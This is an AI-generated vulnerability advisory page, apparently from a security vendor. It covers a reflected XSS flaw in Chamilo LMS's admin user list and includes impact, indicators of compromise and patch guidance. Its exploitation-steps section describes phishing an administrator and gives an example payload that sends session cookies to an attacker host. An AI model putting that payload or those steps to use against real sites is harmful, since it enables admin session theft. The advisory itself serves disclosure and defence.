CVE-2025-52475: 
Chamilo vulnerability analysis and mitigation

Overview

CVE-2025-52475 is a reflected cross-site scripting (XSS) vulnerability in Chamilo LMS affecting the admin/user_list.php endpoint. The keyword_inactive parameter is not properly sanitized, allowing unauthenticated attackers to inject malicious JavaScript via a crafted URL. All Chamilo LMS versions up to and including 1.11.28 are affected; the issue was patched in version 1.11.30. The vulnerability was disclosed on March 2, 2026, and carries a CVSS v3.1 base score of 6.1 (Medium) (GitHub Advisory, Feedly).

Technical details

The root cause is improper neutralization of script-related HTML tags and alternate XSS syntax in user-supplied input (CWE-80, CWE-87). Specifically, the keyword_inactive parameter passed to admin/user_list.php was reflected back into the page without adequate sanitization, enabling injection of arbitrary JavaScript. The fix, committed in 349062d, refactored hidden input generation to use the Display::input method combined with Security::remove_XSS() for all additional parameters in main/inc/lib/sortable_table.class.php, replacing manual HTML string construction that lacked proper escaping (GitHub Commit, GitHub Advisory). Exploitation additionally requires the victim to press a specific keyboard shortcut (ALT+SHIFT+X on Windows/Linux or CTRL+ALT+X on macOS) to trigger the injected script (GitHub Advisory).

Impact

Successful exploitation allows an attacker to execute malicious JavaScript in the browser context of an authenticated administrator who clicks a crafted URL and triggers the required keyboard shortcut. This could result in theft of administrative session tokens or credentials, unauthorized actions within the LMS admin panel (such as modifying user accounts or system configuration), and exposure of sensitive user data managed by the platform. The confidentiality and integrity impacts are limited in scope but are elevated due to the administrative context targeted (GitHub Advisory, Feedly).

Exploitability

No public proof-of-concept exploit code has been identified, and there is no evidence of active in-the-wild exploitation at this time. The EPSS score is approximately 0.045%, reflecting a low probability of near-term exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is constrained by the requirement for user interaction — specifically, an administrator must click a malicious link and then press a specific keyboard shortcut — which significantly reduces the practical attack surface (Feedly, GitHub Advisory).

Exploitation steps

  1. Reconnaissance: Identify publicly accessible Chamilo LMS instances running version 1.11.28 or earlier using search engines or web scanners targeting the /admin/user_list.php endpoint.
  2. Craft malicious URL: Construct a URL targeting the vulnerable endpoint with a malicious JavaScript payload injected into the keyword_inactive parameter, e.g., https://target.example.com/admin/user_list.php?keyword_inactive=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  3. Deliver the URL: Send the crafted URL to a Chamilo administrator via phishing email, chat message, or other social engineering vector, disguising it as a legitimate administrative link.
  4. Trigger execution: The administrator must be logged in and click the malicious link, then press ALT+SHIFT+X (Windows/Linux) or CTRL+ALT+X (macOS) to trigger the reflected XSS payload execution in their browser.
  5. Harvest credentials/tokens: The injected script executes in the admin's browser context, potentially exfiltrating session cookies, credentials, or performing unauthorized administrative actions on behalf of the attacker (GitHub Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from an administrator's browser to unexpected external domains shortly after accessing /admin/user_list.php; unusual GET requests to /admin/user_list.php with URL-encoded script tags or JavaScript in the keyword_inactive parameter.
  • Logs: Web server access logs showing requests to /admin/user_list.php containing <script>, javascript:, or encoded XSS payloads (e.g., %3Cscript%3E) in the keyword_inactive query parameter.
  • Browser/Session: Unexpected session invalidation or new administrative actions (user modifications, configuration changes) not initiated by the legitimate administrator, potentially indicating session hijacking following XSS exploitation.

Mitigation and workarounds

The primary remediation is to upgrade Chamilo LMS to version 1.11.30 or later, which includes the security patch addressing this vulnerability (GitHub Release). As interim measures, administrators should restrict access to the admin panel to trusted networks only, and educate administrators to avoid clicking unsolicited or suspicious links. Deploying a Web Application Firewall (WAF) with rules to detect and block XSS payloads in query parameters can provide additional defense-in-depth (Feedly).

Additional resources


Source: This report was generated using AI

Related Chamilo vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-45140CRITICAL9.8
  • PHP logoPHP
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesSep 17, 2026
CVE-2026-39878CRITICAL9.3
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesJul 20, 2026
CVE-2026-45143CRITICAL9
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesSep 17, 2026
CVE-2026-34239HIGH7.5
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesJul 20, 2026
CVE-2026-82535MEDIUM5.3
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoNoSep 11, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management